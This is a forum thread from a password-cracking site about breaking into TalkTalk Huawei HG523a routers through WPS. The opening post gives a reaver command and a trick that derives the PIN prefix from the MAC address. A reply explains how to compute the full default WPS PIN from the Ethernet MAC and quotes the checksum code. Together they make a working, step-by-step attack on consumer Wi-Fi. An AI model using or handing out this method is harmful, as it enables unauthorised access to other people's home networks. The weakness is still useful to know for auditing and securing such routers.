NEW: We have a Discord server now. Click here to go there now!

NOTE: Why not use our List Manager to crack your lists? Its easy and enables better management.

NOTE: When cracking WPA/WPA2 passwords, make sure you check gpuhash.me first incase it's already been processed.

Home - Wireless Cracking - TalkTalk Huawei Routers & Reaver


3 Results - Page 1 of 1 -
1
Author Message
Avatar
Blegos

Status: n/a
Joined: Mon, 04 Nov 2013
Posts: 68
Team:
Reputation: 125 Reputation
Offline
Tue, 05 Nov 2013 @ 21:24:15

Just thought I'd add a little something to this forum from my experiences with the Huawei HG523a routers that TalkTalk use, or did use. Maybe the following is common news to some, but it might help others.

TalkTalk are a popular ISP where I live and many of my friends are with them. Some have asked me to have a go at cracking their passwords to see if I can, and this is what I've learnt from doing some digging and having a go.

Most of these routers don't have WPS lock-outs so the pins can be found in the normal time, anywhere up to 12 hours. But it's also possible to cut down on that time quite considerably by starting from getting the first four pins, which can be found by taking the following steps:

1.) Take for instance TalkTalk34BDF8 with A1:B1:C1:34:BD:F8 on channel 6
2.) Take the 34BDF8 and convert it from Hex to Dec, which would be 3456504. http://www.binaryhexconverter.com/hex-to-decimal-converter
3.) Start reaver with: 'reaver -i mon0 -b A1:B1:C1:34:BD:F8 -c 6 -p 3456 -vv'
4.) Reaver will then start from 3456 and will be at 90% from the off, which should then only take ~3hrs to crack


In some cases I've seen the pin being up to 6 digits of the hex to dec output and not just 4. I've seen this happen quite often with a lot of my friends routers. One thing I did notice though is if the output starts with a 1 then you'll need to start from the second digit in. So if your hex to dec output is 1569483 then start from 5694, or even 56948 if you can.


Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Tue, 05 Nov 2013 @ 22:57:51

Awesome post, thank you very much Rep +1


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

Avatar
hash-ire

Status: Member
Joined: Mon, 19 Aug 2013
Posts: 257
Team:
Reputation: 307 Reputation
Offline
Wed, 06 Nov 2013 @ 15:23:44

Blegos said:

Just thought I'd add a little something to this forum from my experiences with the Huawei HG523a routers that TalkTalk use, or did use. Maybe the following is common news to some, but it might help others.
TalkTalk are a popular ISP where I live and many of my friends are with them. Some have asked me to have a go at cracking their passwords to see if I can, and this is what I've learnt from doing some digging and having a go.
Most of these routers don't have WPS lock-outs so the pins can be found in the normal time, anywhere up to 12 hours. But it's also possible to cut down on that time quite considerably by starting from getting the first four pins, which can be found by taking the following steps:
1.) Take for instance TalkTalk34BDF8 with A1:B1:C1:34:BD:F8 on channel 6
2.) Take the 34BDF8 and convert it from Hex to Dec, which would be 3456504. http://www.binaryhexconverter.com/hex-to-decimal-converter
3.) Start reaver with: 'reaver -i mon0 -b A1:B1:C1:34:BD:F8 -c 6 -p 3456 -vv'
4.) Reaver will then start from 3456 and will be at 90% from the off, which should then only take ~3hrs to crack
In some cases I've seen the pin being up to 6 digits of the hex to dec output and not just 4. I've seen this happen quite often with a lot of my friends routers. One thing I did notice though is if the output starts with a 1 then you'll need to start from the second digit in. So if your hex to dec output is 1569483 then start from 5694, or even 56948 if you can.


Thanks for posting.

This is not really news to me and maybe to others on this forum. Anyway for anyone who doesn't know here's the correct explaination:

Let's take this access point (fake data):
- ESSID: TALKTALK-4E26C4
- WIFI MAC: A1:B1:C1:4E:26:C4
- ETH MAC: A1:B1:C1:4E:26:CC

Now take the second half of the ETH mac and convert it from hexadecimal to decimal: decimal(0x4E26CC) = 5121740. Complete the PIN with the checksum digit: 51217402.

From reaver source files:

Code:
unsigned int wps_pin_checksum(unsigned int pin) {
 unsigned int accum = 0;
 while (pin) {
  accum += 3 * (pin % 10);
  pin /= 10;
  accum += pin % 10;
  pin /= 10;
 }
 return (10 - accum % 10) % 10;
}

You're done.

You'll notice that the ETH mac is derivable from the WIFI MAC: ETH MAC = WIFI MAC + offset. The offset in this case is 8. If you don't know you may want to try numbers from 1 to 8 (usually).

NOTE: If the converted MAC is 8 digits. Take off the first digit to make space for the checksum. Example: dec(0xFFFFFF) = 16777215 -> 6777215. Add the checksum: 67772155.

Also, the HEX to DEC trick using WIFI or ETH MAC works for other types of router (not NETGEAR ones sadly).



3 Results - Page 1 of 1 -
1

We have a total of 212138 messages in 26015 topics.
We have a total of 23009 registered users.
Our newest registered member is Francescafalk.